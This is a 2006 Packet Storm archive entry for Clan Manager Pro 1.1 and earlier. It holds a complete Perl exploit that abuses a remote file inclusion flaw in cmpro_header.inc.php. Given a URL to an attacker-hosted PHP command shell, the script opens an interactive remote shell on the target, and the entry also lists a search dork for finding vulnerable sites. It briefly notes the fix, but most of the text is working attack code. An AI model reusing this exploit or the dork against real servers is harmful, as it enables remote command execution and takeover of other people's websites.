cmpro-1.1.txt

2006-06-11T00:00:00
ID PACKETSTORM:47211
Type packetstorm
Reporter Florian Strankowski
Modified 2006-06-11T00:00:00

Description

                                        
                                            `Hi,  
  
http://sx02.coresec.de/advisories/149.txt  
  
-- cut here --  
  
#!/usr/bin/perl  
############  
# Clan Manager Pro (CMPRO) <= 1.1  
#  
# Homepage: www.cmpro.org  
# Affected Version: <= 1.1  
# Patched Version: /  
# Date: 06.06.2006  
#  
# Application Risk: High  
#  
# Vendor notified : 06.06.2006  
#  
#  
# Exploit written : Sx02  
# http://sx02.coresec.de  
#  
# usage:# perl cmpro.pl <host> <command shell url> <cmd variable (e.g.:   
cmd)>  
# perl cmpro.pl http://localhost/path/to/cmpro.extern/   
http://localhost/cmd.gif cmd  
#  
# cmd shell example: <? system($cmd); ?>  
# cmd variable: cmd;  
#  
#  
#  
# DORK: inurl:"cmpro.ext"  
#############  
#  
# Vulnerable code (cmpro_header.inc.php)  
#  
# INCLUDE($cm_ext_server.'/config/einstellungen.inc.php');  
# INCLUDE($sitepath.'cmpro.ext/global.functions.php');  
#  
# --------------------------------------------------------  
#  
# $cmd_ext_server and $sitepath were not declared  
# before, so they are vulnerable to remote file  
# inclusion.  
#  
# cmpro_header.inc.php?cm_ext_server=CMD  
# cmpro_header.inc.php?sitepath=CMD  
#  
# --------------------------------------------------------  
#  
# Solution :  
#  
# declare variables before including them !  
#  
# --------------------------------------------------------  
#  
# "Everything should be made as simple as possible, but not simpler"  
# 'Albert Einstein'  
#  
############  
use LWP::UserAgent;  
  
$Path = $ARGV[0];  
$Pathtocmd = $ARGV[1];  
$cmdv = $ARGV[2];  
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }  
head();  
while() {  
print "[shell] \$";  
while(<STDIN>) {  
$cmd=$_;  
chomp($cmd);  
if (!$cmd) {last;}  
$xpl = LWP::UserAgent->new() or die;  
$req = HTTP::Request->new(GET   
=>$Path.'cmpro_header.inc.php?cm_ext_server='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or   
die "\nCould Not connect\n";  
$res = $xpl->request($req);  
$return = $res->content;  
$return =~ tr/[\n]/[ê]/;  
if ($return =~/Error: HTTP request failed!/ ) {  
print "\nInvalid path for phpshell\n";  
exit;  
} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {  
print "\nInvalid Command, error.\n\n";  
}  
if ($return =~ /(.*)/) {  
$finreturn = $1;  
$finreturn=~ tr/[ê]/[\n]/;  
print "\r\n$finreturn\n\r";  
last;  
} else {  
print "[shell] \$";  
}  
}  
} last;  
  
sub head() {  
print   
"\n============================================================================\r\n";  
print " CMPro CMS <= 1.1 Remote Command Execution Exploit\r\n";  
print " Vulnerable found and Exploit written by Sx02\r\n";  
print   
"============================================================================\r\n";  
}  
  
sub usage() {  
head();  
print " Usage: perl cmpro.pl <host> <command-url> <cmd>\r\n\n";  
print " <host> - Path to CMPro Directory : http://localhost/path/to/cmpro/   
\r\n";  
print " <command-url> - PhpShell : http://localhost/cmd.gif \r\n";  
print " <cmd> - var name used in phpshell : cmd \r\n\r\n";  
exit();  
}  
-- cut here --   
`